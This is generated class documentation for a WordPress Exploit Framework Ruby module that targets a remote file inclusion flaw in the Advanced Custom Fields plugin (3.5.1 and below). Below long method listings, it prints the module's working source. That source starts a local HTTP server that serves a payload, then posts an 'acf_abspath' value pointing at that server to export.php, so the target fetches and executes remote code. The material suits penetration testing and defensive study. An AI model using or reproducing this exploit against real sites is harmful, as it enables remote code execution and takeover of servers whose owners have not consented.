Class: Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion

Inherits:

Module

• Object
• Module
• Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion

Includes:

Wpxf, Net::HttpServer

Defined in:

lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

• #check ⇒ Object
• #initialize ⇒ AdvancedCustomFieldsRemoteFileInclusion constructor

  A new instance of AdvancedCustomFieldsRemoteFileInclusion.

• #on_http_request(path, params, headers) ⇒ Object
• #plugin_url ⇒ Object
• #rfi_host ⇒ Object
• #rfi_path ⇒ Object
• #rfi_url ⇒ Object
• #run ⇒ Object
• #vulnerable_url ⇒ Object

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ AdvancedCustomFieldsRemoteFileInclusion

Returns a new instance of AdvancedCustomFieldsRemoteFileInclusion.

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 7

def initialize
  super

  update_info(
    name: 'Advanced Custom Fields Remote File Inclusion',
    desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\
          'allows for remote file inclusion and remote code execution via '\
          'the export.php script. This exploit only works when the PHP '\
          'option "allow_url_include" is enabled (disabled by default).',
    author: [
      'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
      'rastating'                                  # WPXF module
    ],
    references: [
      ['URL', 'http://secunia.com/advisories/51037/'],
      ['WPVDB', '6103']
    ],
    date: 'Nov 14 2012'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Instance Method Details

#check ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 46

def check
  check_plugin_version_from_readme('advanced-custom-fields', '3.5.2')
end

#on_http_request(path, params, headers) ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 62

def on_http_request(path, params, headers)
  payload.encoded
end

#plugin_url ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 42

def plugin_url
  normalize_uri(wordpress_url_plugins, 'advanced-custom-fields')
end

#rfi_host ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 50

def rfi_host
  normalized_option_value('rfi_host')
end

#rfi_path ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 54

def rfi_path
  normalized_option_value('rfi_path')
end

#rfi_url ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 58

def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
end

#run ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 70

def run
  return false unless super

  start_http_server(true)

  emit_info 'Executing request...'
  res = execute_post_request(
    url: vulnerable_url,
    body: {
      'acf_abspath' => rfi_url
    }
  )
  stop_http_server

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  if res.code == 500 || res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end

#vulnerable_url ⇒ Object

# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 66

def vulnerable_url
  normalize_uri(plugin_url, 'core', 'actions', 'export.php')
end